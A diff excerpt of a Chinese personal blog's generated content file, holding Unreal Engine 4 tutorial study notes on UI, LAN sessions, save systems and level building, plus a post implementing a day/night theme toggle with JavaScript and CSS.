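    ​如果一页里要放多张地图,也可以把配置收进一个数组批量渲染(一个小示意,基于上面的 LeafletMap 类;id、坐标、文案均为占位,每个 id 对应页面上的一个 <div>):

    <script defer>
        [
            { id: "map_a", coord: [26.XX, 119.XX], zoom: 17, text: "A 点" },
            { id: "map_b", coord: [26.XX, 119.XX], zoom: 15, text: "B 点" }
        ].forEach(cfg => new LeafletMap(cfg.id, cfg.coord, cfg.zoom, cfg.text).render());
    </script>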
    ]]>
    @@ -2841,7 +2841,7 @@ /posts/Software-%E8%B0%8C%E5%98%89%E8%AF%9A%20UE4%20%E6%95%99%E7%A8%8B%EF%BC%8863-68%EF%BC%89/
    + 资源

    课程

    【UI】01 课:显示图片到屏幕上

    UE

    ​创建一个 Widget Blueprint 类。

    UE

    ​跟 Unity 里的 UI 系统好像……拖一张图调一调参数。

    UE

    ​打开关卡蓝图。

    UE

    ​节点里选择所创建的 Widget Blueprint

    UE

    Add to Viewport 节点即可显示 UI。

    UE

    Add to Viewport 和 Add to Player Screen 在这里起同样的效果,仅在多人游戏时才会有区别。

    【UI】02 课:UI 主菜单制作

    UE

    ​创建一个 Pawn

    UE

    ​往这个 Pawn 里塞一个 Camera

    UE

    ​调整第三人称游戏场景,将 Player 0 交给这个摄像机。

    UE

    ​创建一个 Widget Blueprint 类,设置一个 Vertical Box,里面放上三个按钮,设为 Fill,然后一阵操作。

    UE

    ​此时就可以把按钮的事件整进 Widget Blueprint 类开始写按下按钮时的逻辑了。Get All Actor Of Class 蓝图通信一波,最后将控制权交给小白人。

    UE

    ​退出游戏的逻辑。

    【选看】03 课:使用多格式文本块

    UE

    ​创建一个 Widget Blueprint 类。

    UE

    ​创建一个 Data Table

    UE

    ​类别选择 RichTextStyleRow

    UE

    ​给这个 Data Table 加两行。操作一下这两行对应的文字属性。第一行名称最好是 Default

    UE

    ​设置字体时可以打开 Show Engine Content 以获取可用的字体。

    UE

    Widget Blueprint 中创建一个 RichTextBlock,Text Style Set 选择创建的 Data Table,Text 里设置为:

    你好啊朋友!

    <CUSTOM>我要把你做成一个玩偶!</>

    【UI】04 课:UI 动画和暂停游戏

    UE

    ​创建一个 Widget Blueprint:Pause,绘制好 UI。

    UE

    ​随便找一个蓝图(角色蓝图/关卡蓝图/自己建的蓝图,只要能接受输入就行),放上按下 Q 显示这个 UI 的逻辑。

    UE

    WorldSettings 里创建一个新的 GameMode 以显示鼠标。

    UE

    WorldSettings 里创建一个新的 PlayerController 以显示鼠标。

    UE

    PlayerController 里将 Enable Click Events 打开。此时即可正确处理 UI。

    UE

    ​接下来实现 UI 动画。左下角创建一个动画 Appear,之后类似 Pr 的方式设置 UI 的关键帧动画。

    UE

    ​UI 蓝图里自定义事件 BeginAnim,触发这个事件时播放动画 Appear

    UE

    ​按下确认按钮时退出游戏。

    UE

    ​按下继续游戏按钮时反方向播放动画,隐藏 UI。

    UE

    ​修改角色蓝图中按下 Q 显示 UI 的逻辑。

    【UI】05 课:3D UI 的交互和显示

    UE

    ​创建一个 Widget Blueprint,绘制好 UI:两个 Button、一个半透明 Border。

    UE

    ​新建一个 Actor 蓝图,设置 Widget Class。里面添加 Widget 节点,Rendering 下的 Blend Mode 选择 Transparent

    UE

    将 User Interface 的大小设为与 UI 的大小一致。

    UE

    ​在第一人称人物中,给枪下面安装节点 WidgetInteraction,调整 Transform,可以打开 Show Debug 以便于调试。

    UE

    ​此时 WidgetInteraction 检测到 UI 对象就会显示红点。

    UE

    ​编辑人物蓝图。

    • 新建一个 bool 类型变量 IsFullyAutomatic,用于控制射击方式是全自动/半自动。
    • 定义一个自定义事件 FullyAutomatic_Event,用于蓝图通信以设置 IsFullyAutomatic
    • 定义一个自定义事件 EnableFullyAutomatic_Event,执行这个事件会开火,通过 Set Timer by Function Name 来实现全自动开火,Clear Timer by Function Name 来实现停止开火。
    • Press Pointer Key 和 Release Pointer Key,用来在 Widget Interaction 获取到 UI 时触发鼠标点击事件。

    UE

    ​设置 UI 的蓝图,按下按钮时设置事件。

    UE

    ​要想纯用鼠标控制 3D UI,先自定义一个 PlayerController,应用之并将 EnableClickEvents 给我关了。

    UE

    ​编辑这个 PlayerController 的蓝图,如此绘制之,并将 Interaction Source 设为 Mouse

    UE

    ​新建一个 pawn 类,里面添上 camera 并获取控制权,运行关卡,此时 3D UI 可以正确运行。

    选看

    【选看】多个界面切换和局域网联机

    UE

    ​创建三个 Widget Blueprint

    • FindServer 查找服务器 UI。
    • JoinServer 显示服务器信息和加入按钮的 UI,放置在查找服务器 UI 的列表里。
    • MainMenu 主菜单 UI。

    UE

    ​创建两个第三人称关卡:

    • MainMenu 主菜单。
    • GameMap 游戏地图。

    UE

    ​设计 MainMenu 的 UI 如图所示。

    UE

    ​设置 FindServer 的 UI 如图所示,设计一个 ScrollBox 用于存放 JoinServer

    UE

    ​设置 JoinServer 的 UI 如图所示,可以加一个 Size Box 控制 UI 大小。

    UE

    ​将 JoinServer 的 UI 的显示模式设置为 Desired,调整大小至原点。

    UE

    JoinServer 下新建一个 String 类型的变量 Name,设为 public 并勾选 Expose on Spawn。

    UE

    ​将文字与 Name 绑定。

    UE

    JoinServer 下新建一个 Blueprint Session 类型的变量 Server,设为 public 并勾选 Expose on Spawn。

    UE

    ​绘制 MainMenu 下按下创建房间按钮的逻辑。

    • Create Session 是网络联机相关的内容。
    • Open Level 可以切换到名称为 GameMap 的关卡。

    UE

    GameMap 里整俩出生点。

    UE

    在 MainMenu 关卡的 Level Blueprint 里显示 MainMenu 的 UI。

    UE

    ​绘制 MainMenu 下按下打开服务器按钮的逻辑——清除所有 UI,然后显示 UI FindServer

    UE

    ​绘制 MainMenu 下按下打开退出游戏的逻辑 QuitGame

    UE

    ​绘制 FindServer 下按下返回按钮的逻辑——清除所有 UI,然后显示 UI MainMenu

    UE

    FindServer 下定义一个刷新服务器事件 FreshServer_Event

    • Find Sessions 查找可用连接。
    • 如果找到可用服务器,创建 JoinServer 的 UI,设置其变量 Server 和 Name 的值,并将其添加为 Scroll Box 的子项。

    UE

    ​创建对象和按下刷新按钮时都可以触发这个事件。

    UE

    ​创建 FindServer 下 CircularThrobber 的 Visibility 属性的绑定。

    UE

    ​绑定的逻辑:如果 Scroll Box 下有子节点,则不显示,否则显示。

    UE

    ​运行游戏时选择 Number of Players 为 2。

    UE

    ​开跑!A 加入游戏后,B 就会显示 A 的服务器信息。

    UE

    ​编写 JoinServer 中按下加入按钮的逻辑——JoinSession 即可加入。

    UE

    ​开跑!

    【选看】简易版本地存档、读档系统

    UE

    ​创建两个 Widget Blueprint:SaveGame_UMG(存档界面)和 SaveGameSlot(存档项)。

    UE

    SaveGameSlot 如此设计。

    UE

    ​ 给 SaveGameSlot 设计两个变量(读档时设置这两个变量):String 类型的 Text 和 Vector 类型的 Location,并且都勾选 Instance Editable 和 Expose on Spawn。

    UE

    ​将 TextBlock 里的 Text 与变量 Text 绑定。

    UE

    ​绘制 SaveGameSlot 里的蓝图,按下 Load_Btn 时执行读档操作,将 Third Person Character 的 Location 设为存档里的 Location。

    UE

    ​绘制 SaveGame_UMG 的 UI 界面,其中的 Scroll Box 用于存放存档信息(SaveGameSlot),让信息放不下的时候显示滚动条。

    UE

    ​创建一个 SaveGame 类,命名为 SaveGame_BP

    UE

    SaveGame_BP 里设计两个变量:String 类型的 SaveGameName 和 Vector 类型的 PlayerLocation,并且都是数组。

    UE

    SaveGame_UMG 中将 ScrollBox 设为变量。

    UE

    ​在关卡蓝图/角色蓝图中绘制读档界面的逻辑。

    UE

    ​在关卡蓝图/角色蓝图中绘制按下 Tab 键存档的逻辑。

    UE

    ​存档位置。

    UE

    ​在关卡蓝图/角色蓝图中绘制按下 P 键显示/隐藏读档界面的逻辑。

    UE

    ​开跑!

    ]]>
    @@ -2949,7 +2949,7 @@ /posts/Latex-%E8%AE%BA%E6%96%87%E6%8E%92%E7%89%88%E8%B8%A9%E5%9D%91%E8%AE%B0%E5%BD%95/ -
    ]]>
    +
    ]]>
    @@ -3001,7 +3001,7 @@ /posts/Hexo-%E6%98%BC%E5%A4%9C%E5%88%87%E6%8D%A2/
    + [data-theme='light']{.dark{display: none;}}[data-theme='dark']{.light{display: none;}}

    前言

    ​现在博客按下右边栏的昼夜切换按钮,就可以在白天 / 黑夜模式之间进行切换!

    昼夜切换昼夜切换

    快按它快按它快按它~

    正文

    data-theme

    ​主要原理:在 <html> 上添加变量,值为 light 或 dark,剩下的交给 CSS。

    ​新建一个 toggleTheme.js 用于实现这个功能。

    function getTheme() {
        if (localStorage.getItem('theme') !== null) {
            return localStorage.getItem('theme');
        }
        if (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches) {
            // 检测暗色模式
            return "dark";
        } else if (window.matchMedia && window.matchMedia('(prefers-color-scheme: light)').matches) {
            // 检测白天模式
            return "light";
        } else {
            // 用户没有设置偏好或浏览器不支持
            return "light";
        }
    }

    function setTheme() {
        document.documentElement.setAttribute('data-theme', getTheme());

        // giscus https://blog.jvav.me/posts/change-giscus-theme-at-runtime
        document.querySelectorAll("iframe.giscus-frame")?.forEach(frame => {
            frame.contentWindow.postMessage(
                {
                    giscus: {
                        setConfig: {
                            theme: getTheme() === 'light' ? 'light' : 'dark_high_contrast',
                        },
                    },
                },
                "https://giscus.app"
            );
        });
    }

    function setToggleThemeButtonListener() {
        const toggleButton = document.getElementById('js-toggle_theme');
        toggleButton.addEventListener('click', toggleTheme);
        function toggleTheme() {
            localStorage.setItem('theme', getTheme() === 'light' ? 'dark' : 'light');
            setTheme();
        }
    }
    • getTheme() 获取主题。

      • 如果 localStorage.getItem('theme') 的值存在,说明用户设置过主题,使用设置的主题。

      • 查询用户系统是否存在昼夜主题偏好,若没有则使用白天主题。

    • setTheme() 设置主题。

    • setToggleThemeButtonListener() 昼夜切换按钮的监听,侧边栏创建一个按钮。

      <div class="rightside-button" id="js-toggle_theme">
      <span>
      <img no-lazy src="<%- theme.icon.toggle_theme %>" class="rightside-button-icon" alt="Icon">
      </span>
      </div>
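
    ​顺带一提,如果想在用户没有手动选过主题时跟随系统昼夜偏好的变化,可以再加一个监听(一个小示意,基于上面的 getTheme / setTheme):

    // 示意:系统昼夜偏好变化时,若用户从未手动设置过主题,则跟随系统
    window.matchMedia('(prefers-color-scheme: dark)').addEventListener('change', () => {
        if (localStorage.getItem('theme') === null) {
            setTheme();
        }
    });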

    防止闪烁

    ​这个 setTheme() 必须放在页面渲染前执行,不然加载页面时会有昼夜切换的闪烁,影响体验。(参考:暗色模式下页面刷新或切换出现闪烁的问题 · Issue #107 · Siricee/hexo-theme-Chic (github.com))

    <!DOCTYPE html>
    <html lang=<%= theme.lang %> data-theme="light">
    <%- js('js/widget/toggleTheme.js') %>
    <script>
        setTheme();
    </script>
    <head>
        <%- partial('_partial/head') %>
    </head>

    <body>
        <%- body %>
        <%- partial('_partial/footer') %>
    </body>
    </html>

    var.css

    ​CSS 中,写好昼夜模式下的颜色变量。

    [data-theme='light'] {
        --global-bg: #fff;
        --text-primary: #333;
        --text-secondary: #757575;
        --text-link: #3c79b6;
        --background-primary: #fff;
        --background-secondary: rgba(255, 255, 255, 0.95);
        --background-tertiary: #efefef;
        --blockquote-bg: #fafafa;
        --border: #e0e2e5;
        --code-bg: #f1f5fb;
        --highlight-tools-bg: #e6ebf1;
        --highlight-tools-text: #b3b3b3;
        --tabs-bg: var(--tabs-bg); /* 注意:变量自引用会使其失效,这里应填入具体颜色 */
        --gallery-content-description-bg: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(255, 255, 255, 0.9), rgba(255, 255, 255, 0.9), rgba(0, 0, 0, 0));
        --tr-bg: hsla(0, 0%, 96.5%, 0.51);
        --scrollbar-color: auto;
        --hr-color: #efefef;
    }

    [data-theme='dark'] {
        --global-bg: #0d0d0d;
        --text-primary: #ddd;
        --text-secondary: #aaa;
        --text-link: #80c8f8;
        --background-primary: #1a1a1a;
        --background-secondary: rgba(0, 0, 0, 0.95);
        --background-tertiary: rgba(0, 0, 0, 0.95);
        --blockquote-bg: #2c2c2c;
        --border: #cdcdcd;
        --code-bg: #2c2c2c;
        --highlight-tools-bg: #1a1a1a;
        --highlight-tools-text: #cdcdcd;
        --tabs-bg: #2c2c2c;
        --tr-bg: rgba(0, 0, 0, 0.51);
        --gallery-content-description-bg: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.9), rgba(0, 0, 0, 0.9), rgba(0, 0, 0, 0));
        --scrollbar-color: #525252;
        --hr-color: #666;
    }

    其它

    ​从 Hexo 博客音乐播放器 Aplayer 深色模式 css 文件 | 张洪 Heo (zhheo.com) 抄一个深色模式的 Aplayer 的 css。

    ​昼夜切换的过程中,给有变色的元素添加过渡动画:transition: XXX 0.5s ease-in-out;

    ​其它的就是修图 & 乱调 CSS 了。

    ​(夜间模式看顺眼了还不习惯改回来了)

    ]]>
    @@ -3028,7 +3028,7 @@ /posts/Software-%E8%B0%8C%E5%98%89%E8%AF%9A%20UE4%20%E6%95%99%E7%A8%8B%EF%BC%881-26%EF%BC%89/
    + 资源

    课程

    选看

    【选看】什么是虚幻引擎、适合什么人学、支持平台、经验分享

    这系列课程能带给你什么?

    • 能够了解虚幻 4

    • 了解虚幻 4 能够制作什么

    • 能够确认自己是否适合学习虚幻 4

    • 能够获得自我学习的途径

    • 能够熟悉基本的虚幻 4 的界面操作

    • 能够搭建简单的场景

    • 能够制作简单的互动(开关门、昼夜交替)

    • 能够使用地形工具绘制地形

    • 能够制作地形材质

    • 能够了解虚幻 4 渲染特性(灯光、后期、雾)

    • 能够制作简单的 UI 界面

    • 能够制作简单的过场动画

    • 了解虚幻 4 的一些基本概念

    什么是虚幻 4?

    • 虚幻 4

      是由 Epic Games 开发的一个游戏引擎,Epic Games 是一家美国视频游戏和软件开发公司。虚幻 1 由 Tim Sweeney(Epic Games 的创始人)开发,于 1998 年 5 月发行。从企业应用和电影体验到高品质的 PC、主机、移动、VR 及 AR 游戏,虚幻 4 能够提供从启动项目到发行产品所需的一切。世界级的工具套件以及简易的工作流程能够帮助开发者快速迭代概念并立即查看成品效果,且无需触碰一行代码。而完整公开的源代码则能让虚幻引擎 4 社区的所有成员都能够自由修改和扩展引擎功能。

    • 行业前景

      越来越多的开发者,开发商投入到虚幻 4 中,简单的说就是使用虚幻 4 的人越来越多了,许多独立游戏,大厂的游戏都在使用虚幻 4 来开发,加上虚幻 4 对开发者来说使用完全免费,所有源代码都是开源的,你只需要在发行的时候支付 5% 的费用。

    虚幻 4 都有哪些功能?

    • 实时逼真渲染

      “开箱即用”的好莱坞级视觉效果。虚幻引擎基于物理的渲染技术、高级动态阴影选项、屏幕空间反射以及光照通道等强大功能将帮助您灵活而高效地制作出令人赞叹的内容。

    • 蓝图:创作,无需代码

      有了对于设计师更加友好的蓝图可视化脚本,您无需触碰一行代码,就能快速制作出原型并推出交互内容。您可以使用蓝图构建对象行为和交互、修改用户界面、调整输入控制以及许多其他操作。您还可以使用强大的内置调试器在测试作品的同时可视化玩法流程并检查属性。

    • 包含完整的 C++ 源代码

      通过完整的 C++ 源代码,您能够学习、自定义并调试整个虚幻引擎,并毫无阻碍地发行您的产品。

    • 稳健的多人框架

      历经 20 多年的发展,虚幻引擎的多人框架已通过众多平台以及不同游戏类型的考验,制作过众多业内顶尖的多人游戏体验。虚幻引擎推出的“开箱即用”型客户端/服务器端结构不但具有扩展性,而且久经考验,能够使任何项目的多人组件“立等可用”。

    • VFX 与粒子系统

      内置的 Niagara 和级联粒子视觉效果编辑器能让您采用大量不同类型的模块,完全自定义粒子系统;利用粒子光照点亮您的场景,并使用向量场构建复杂的粒子运动、模拟现实情境,制作出专业级的完美成品。

    • 灵活的材质编辑器

      虚幻引擎 4 的材质编辑器采用基于物理 PBR 的着色技术,赋予您对于角色和物体外观和感觉的空前掌控力。使用以节点为基础的直观工作流程快速创建多种经得起近距离检验的表面。像素级别的图层材质和可微调的值能让你创作出任何想要的风格。

    • 电影级后期处理效果

      虚幻引擎的后期处理能让您优雅地调整场景的外观和感觉。动动指尖就能轻松获得电影级的效果,包括环境立方体贴图、环境遮挡、高级泛光、颜色分级、景深、人眼适应、镜头光晕、光束、临时采样抗锯齿和色调映射等众多实用功能。

    • 包罗万象的动画套件

      通过虚幻的网格体以及动画编辑工具,您能够完全自定义角色。工具中强大的功能包括了状态机、混合空间、逆向运动学和由动作驱动的物理特性。您可以使用动画蓝图高效工作,通过即时预览动作,制作出真正的动态角色以及真实可信的动作。

    • Sequencer:专业动画

      由影视行业专家设计的 Sequencer 是款完整的非线性、实时动画编辑工具,专为多人协同工作而生,能够释放您的创作潜能。它能让您以镜头为单位逐一定义和修改光照、镜头遮挡、角色以及布景。使用动画运镜和实时游戏录制创作各种不同的动态剪辑。

    • 地形与植被

      使用地形系统创建巨大的、开放的世界环境。得益于地貌系统强劲的 LOD 系统和高效的内存使用,您可以创建比过去大出几个数量级的地形。使用 Landscape Grass 功能用不同类型的花草自动覆盖庞大的户外环境,并使用植被工具快速地绘制摆放树木、灌木、岩石及其他装饰物。

    • 专为 VR、AR 及 MR (XR) 而生

      得益于 Epic 与全球顶尖的硬件及软件厂商间紧密的合作,虚幻引擎能为虚拟现实 (VR)、增强现实 (AR) 及混合现实 (MR) 体验的创作者提供最高品质的解决方案。通过与最流行的各大平台实现本地集成,以及前向渲染、多采样抗锯齿 (MSAA)、实例化双目绘制和单视场远景渲染等优化手段,UE4 能够在无损性能的前提下制作出高品质的成果。

    • 先进的人工智能

      通过虚幻引擎 4 的游戏框架及人工智能系统,可赋予 AI 控制角色对周围世界更好的空间意识,同时使他们能够更智能地行动。随着您不断移动对象,动态导航网格体会实时更新,以获得最佳路径。

    虚幻 4 适合什么人学?

    • 爱玩游戏的
      可能平时爱玩游戏,总想做一个自己的游戏,可以自己主导整个游戏剧情,玩法,以做游戏为业余爱好的朋友
    • Unity 转行的
      可能刚刚由于种种原因,转行做 UE4 的朋友
    • 有代码基础的
      可能之前学习过代码 (PHP、JAVA、C++),并对 UE4、做游戏有强烈热情的朋友
    • 大学期间有空闲时间的
      如果你还在迷茫,不知以后干嘛,学习虚幻 4 可能是一个不错的选择。以兴趣爱好出发,总会有意想不到的收获!
    • 室内设计的(美术方向)
      虚幻 4 对于美术方面也是非常友好的,熟悉参数后就能调整到不错的画面,加上蓝图不需要任何代码,就可以实现一些简单的互动。
    • 更多…

    虚幻 4 支持的平台

    ​虚幻 4 还有很多插件,方便其他软件的用户使用,如 Vray,3dsmax,Speed tree,True sky。以及很多硬件厂商都有对应的 SDK 支持。

    虚幻 4 制作的游戏

    ​堡垒之夜、绝地求生、往日不在、方舟、SCUM、叛乱 2:沙漠风暴……

    分享自己的学习之路

    要点:

    1. 兴趣、热情
    2. 做一个自己想做的游戏
    3. 成就感
    4. 动力
    5. 能够独立解决问题
    6. 遇到问题能够快速的查阅相关资料
    7. 钻研精神

    你们可能会问的问题

    ​问:学习虚幻 4,一定要学 C++ 吗?

    ​答:肯定的,就程序这条路而言,从一个初级虚幻 4 工程师到中级甚至是高级工程师,C++ 熟练掌握是必须的,入门可以先从蓝图开始。

    ​问:学习虚幻 4 需要什么配置的电脑?

    ​答:首先最好使用英伟达的游戏系显卡,虚幻 4 对配置要求还是蛮高的。如果预算有限、刚刚入门,就我经验而言,差不多买个五六千的组装机就可以了。

    ​CPU: i7-7700、显卡: GTX1060、内存: 8g、固态 128g(这是我能接受的最低配置,上不封顶)

    ​问:我没有代码基础或者是转行过来的,容易学吗?好上手吗?

    ​答:虚幻 4 上手入门不难,学精就难了,所以一开始可以抱着玩游戏的心态(也就是兴趣,不是随便玩一玩的意思)。况且虚幻 4 有蓝图(不需要写任何代码),无论你是学习程序,还是美术,都可以在一开始实现一些简单的功能,做一些简单的游戏,增加你的成就感!

    ​问:学习虚幻 4 是否要学报英语培训课?(是否要学英文)

    ​答:不一定,但是能够同时进行是最好的,毕竟虚幻 4 很多功能选项还是英文的,不过随着版本的不断更新,汉化的力度越来越强大,我现在学习有时候都是用英文版本的,再开一个中文版本的作为翻译。

    【选看】学习虚幻引擎的 15 个途径

    【选看】虚幻引擎版本选择

    ​4.24

    【选看】虚幻引擎全流程安装

    1. 注册和登录 Epic Games 账号
    2. 下载和安装 Epic Games 启动器
    3. 使用和介绍 Epic Games 启动器
    4. 安装虚幻引擎

    【选看】新版本下载流程、更改缓存路径

    更改缓存路径

    ​ 将 安装盘:\Program Files\Epic Games\UE_4.24\Engine\Config\BaseEngine.ini

    DeleteUnused=true, UnusedFileAge=34, FoldersToClean=-1, Path="%ENGINEVERSIONAGNOSTICUSERDIR%DerivedDataCache", EditorOverrideSetting=LocalDerivedDataCache)

    中的 Path="%ENGINEVERSIONAGNOSTICUSERDIR%DerivedDataCache" 改为:Path="%GAMEDIR%DerivedDataCache"。
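
    ​修改后的这一行大致如下(行内其余字段保持原样):

    DeleteUnused=true, UnusedFileAge=34, FoldersToClean=-1, Path="%GAMEDIR%DerivedDataCache", EditorOverrideSetting=LocalDerivedDataCache)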

    ​如此做,项目的缓存路径就会在项目的根目录创建,以减少 C 盘占用空间。

    【选看】虚幻 4 闪退原因汇总

    【选看】虚幻 4 免费素材渠道汇总

    • 虚幻商城

    虚幻商城

    基础

    ###【基础】01 课:创建项目全流程和模板试玩

    ​打开 Unreal4.22,创建项目:

    创建项目

    创建项目


    虚幻 4 工程文件夹的结构:

    • Config:包含了项目设置,键盘输入之类的配置文件
    • Content:存放引擎或游戏的内容,包括地图、贴图、模型、材质、蓝图等
    • Intermediate:包含了在编译引擎或游戏时生成的临时文件
    • Saved:包含了自动保存内容,配置 (*.ini) 文件以及日志文件
    • uproject:项目启动程序,开启我们的项目

    【基础】02-1 课:超详细编辑界面介绍

    ​介绍虚幻 4 的界面,跟 Unity 的差不多,有些没接触过的:

    ​视图界面:

    视图界面

    ​书签可以保存 / 读取特定的视口。

    视图界面

    ​视图模式显示某些内容或是辅助信息。

    【基础】02-2 课:视口导航(在视口界面移动视角)

    ​不同于其他三维应用程序(聚焦和围绕一个正在构建的资源),虚幻引擎视口移动功能按键专门用于对大型游戏关卡进行布景,其中快速穿越大范围区域的功能非常关键。

    功能按键与对应操作:

    • 左键单击 + 拖动:前后移动视口摄像机和左右旋转视口摄像机。
    • 右键单击 + 拖动:旋转视口摄像机,不前后移动。
    • 左单击 + 右单击 + 拖动 / 滚轮单击 + 拖动:在世界场景中上下移动视口摄像机。
    • Ctrl + Alt + 单击 + 拖动:创建方形选取框。
    • 按住鼠标右键 + WASD 键:像在典型的第一人称射击游戏中那样导航关卡。
    • F 键:将视口摄像机聚焦到视口中选中的 Actor 上。
    • Alt + 鼠标左键 + 拖动:围绕单个的支点或兴趣点翻转视口。
    • Alt + 鼠标右键 + 拖动:向前推动摄像机使其接近或远离单个支点或兴趣点。
    • Alt + 中键单击 + 拖动:根据鼠标移动的方向将摄像机向左、右、上、下移动。

    【基础】03 课:物体编辑(坐标系、变换、单位)

    变换

    ​选中对象,W 移动,E 旋转,R 缩放。

    ​设置局部坐标系 / 全局坐标系。

    全局 / 局部

    单位和度量

    • 默认情况下,1 个虚幻单位(uu)等于现实世界的 1 厘米(cm)。这是一个要注意的重要细节,你应将其应用于设计和游戏的所有方面,以开发出相应的环境、角色、效果等。
    • 默认情况下,玩家通常在游戏世界场景中高约 6 英尺:相当于 180 厘米,或 180 uu。为了满足项目的需要,你可以更改此默认值。但无论默认值是什么,你都可以将其用作基值来为所有其他 Actor 的大小建立情境。

    枢轴偏移

    • 中键 选中物体中心再拖动,右键可以设置该对象的中心(枢轴偏移):

    设置枢轴偏移

    框选

    • Ctrl + Alt + 左键 可以进行框选。

    复制

    • 选中对象,Alt + 左键 可以复制对象。

    【基础】04 课:导入资源、项目迁移和管理

    一些最常用的文件类型和资源类型以及相关的应用程序

    资源类型(文件扩展名 / 相关应用程序):

    • 三维模型、骨架网格体结构、动画数据:.fbx、.obj(Maya、3ds Max、ZBrush)
    • 纹理和图片:.bmp、.jpg、.pcx、.png、.psd、.tga、.hdr(Photoshop)
    • 字体:.otf、.ttf(BitFontMaker2)
    • 音频:.wav(Audacity、Audition)
    • 视频和多媒体:.wmv(After Effects、Media Encoder)
    • PhysX(物理类):.apb、.apx(APEX PhysX Lab)
    • 其它:.csv(Excel)

    ​许多资源不是导入的,而是直接在编辑器中创建的。
    ​常见示例:

    • 蓝图类
    • 粒子系统
    • 材质和材质实例

    ​选择某个资源,打开引用查看器可以查看这个资源与哪些其它资源绑定。

    引用查看器

    ​导入 / 导出资源最好使用虚幻引擎的迁移功能,使用复制粘贴有可能导致一些兼容性问题。

    迁移

    【基础】05-1 课:主流三维软件模型导入虚幻 4

    ​对于一些主流的三维建模软件(3ds max、C4D),可以使用 Datasmith 插件将模型导入到虚幻引擎中。

    ​对于 Maya,有 Maya Live Link 这个插件。

    Maya Live Link

    fbx 格式和 obj 格式的共同点:
    它们都是三维通用模型格式,都支持三个点以上的面,都可以用在目前几乎所有主流的三维软件中。
    fbx 格式和 obj 格式的大致区别:
    fbx 中包含动画、材质特性、贴图、骨骼动画、灯光、摄像机等信息;obj 中不包含动画、材质特性、贴图路径、动力学、粒子等信息。
    abc 格式(Alembic,直译“蒸馏器”):
    支持动画、粒子等,可以 bake 三维场景的模型、流体、动画、特效等数据。

    传统文件格式的导入:

    导入 fbx

    ​emmm 感觉一个比较有用的是 合并网格体,其它随意。

    戴珍珠耳环的少女

    ​试了下导入之前建的模型,眼睛应该是建模的时候没设好材质……其它 OK。

    【基础】05-2 课:Datasmith 插件使用全流程

    ​给 3ds Max、C4D 安装这个插件,这样导出文件的时候就会多一个 Datasmith 文件格式的选项,这样一些材质参数就能够被虚幻引擎所识别。

    4.24 的 datasmith 插件是内置到虚幻引擎中了
    但是 4.24 以下的版本并没有
    需要在虚幻商城中搜索 datasmith
    然后选择 unreal datasmith 插件安装到对应的版本中即可~

    【基础】06-1 课:BSP 画刷的概述和使用方法

    什么是 BSP(画刷)?

    1. BSP (Binary Space Partitioning(二进制空间分区))
      在虚幻引擎 4 中有很多不同的方法可以创建、编辑场景中的几何体。通常意义下,相对于直接创建几何体而言,使用静态网格体是比较好的做法(性能上较优秀)。同时,由于静态网格体要求在引擎外部的 3D 建模软件中创建,因此可以使用引擎的几何体编辑工具快速地为游戏原型搭建场景。

      所以就有了 BSP(画刷)工具,能够帮助你们在虚幻引擎快速的搭建一些基本的模型!

    2. 另外一个解读
      BSP 画刷是虚幻的关卡构建中最为基本的工具。从理论上说,最好将 BSP 想象为可以在关卡中进行填充并切除空间体积的东西。很久之前,BSP 被用来作为关卡设计中的主要构建模块。但是现在,这个角色由静态网格物体来承担,相较而言,静态网格物体远为高效。不过,作为关卡和物体的快速原型化工具,以及对于那些无法使用 3D 建模工具而需要进行关卡构建的人来说,BSP 依然很有用。

    ​就是用虚幻引擎实现一些简单的建模功能。

    BSP 画刷的用途

    1. 粗略画出关卡

      开发关卡的标准工作流程是这样的:

      • 设计出关卡草图及关卡路径。
      • 运行关卡测试流程和游戏性。
      • 修改布局并反复测试。
      • 起始的网格物体环节。
      • 起始的光照环节。
      • 对碰撞及性能问题的游戏测试。
      • 润色。
    2. 简单过滤器几何体

      通常,在关卡设计师制作关卡的过程中,他们会突然遇到一种情形:需要一块非常简单的几何体来填充空隙或空间。如果没有现成的静态网格物体填充空间,不需要麻烦美术组创建一个自定义网格物体,设计师只需使用 BSP 就可以填充这个空间。尽管静态网格物体在性能方面更好,但是只要几何体简单,就可以在不造成任何严重影响的情况下偶尔使用 BSP。

    BSP 画刷工具的使用

    BSP 模式

    ​感觉要比 Unity 里的要更高级一点……

    选择多个面

    ​细节面板里可以选择多个面,把材质拖上去以应用材质。

    【基础】06-2 课:房子搭建全流程

    ​内容浏览器下新建一个关卡,一片漆黑……往场景添加:定向光源、天空光照、天空大气、体积云、指数级高度雾。

    新建关卡

    ​内容浏览器下 添加功能或内容包…,导入 第三人称游戏 素材包。

    导入人物

    将 内容/ThirdPersonBP/Blueprints/ThirdPersonCharacter.uasset 拖入场景,在 细节 中搜索 poss,将 Pawn 下的 自动控制玩家 设为 玩家0,此时运行关卡就会以第三人称小人的形式进行。

    设置玩家控制权

    创建立方体

    ​使用 BSP 创建立方体作房屋主体,注意是在几何体里而不是基础里。

    在 Brush Settings 里设置好对应的 XYZ 尺寸(而不是直接缩放,缩放会导致材质问题)。

    ​设置好 中空 和 墙壁厚度。

    中空的门

    ​设置一个 Subtractive 类型的立方体作门,如果把地面也挖了,在地面的 Brush Settings 设置好排序。

    楼梯

    ​挖楼梯。

    内饰

    ​从 内容/StarterContent/ 里选取对应的素材,一阵操作。

    内饰

    ​玻璃房里可以添加 球体反射采集,增加真实性。

    打包

    ​将所有用 BSP 画出来的东西打包成一个静态网格体。

    【基础】06-3 课:静态网格模型碰撞设置

    设置碰撞体

    ​双击某个静态网格体,可以设置碰撞体(类似 Unity 的 Mesh Collider?)

    设置碰撞体

    ​这个椅子可以从细节面板的 静态网格体 里设置碰撞。

    设置碰撞体

    ​此法设置碰撞体类似于 Unity 里的 Box Collider。

    【基础】06-4 课:合并 Actor(合并静态网格体)

    合并静态网格体

    ​世界大纲中选择想要合并的静态网格体,窗口 - 开发者工具 - 合并 Actor。

    【基础】07-1 课:地形工具的使用

    创建地形

    ​模式下 管理,设置好参数,建立地形。

    雕刻 类似 Unity,制造坑坑洼洼。

    绘制 类似 Unity,给地形上材质。

    编辑样条

    编辑样条 在地形上创建样条线。

    编辑样条

    Ctrl + 左键 添加控制点。

    创建地形

    Landscape Spline 选择 分段 以选择所有样条线,在 Landscape Spline Meshes 中选择对应的网格体和材质覆盖,创建一个类似马路的东东。

    【基础】07-2 课:灰度图生成地形

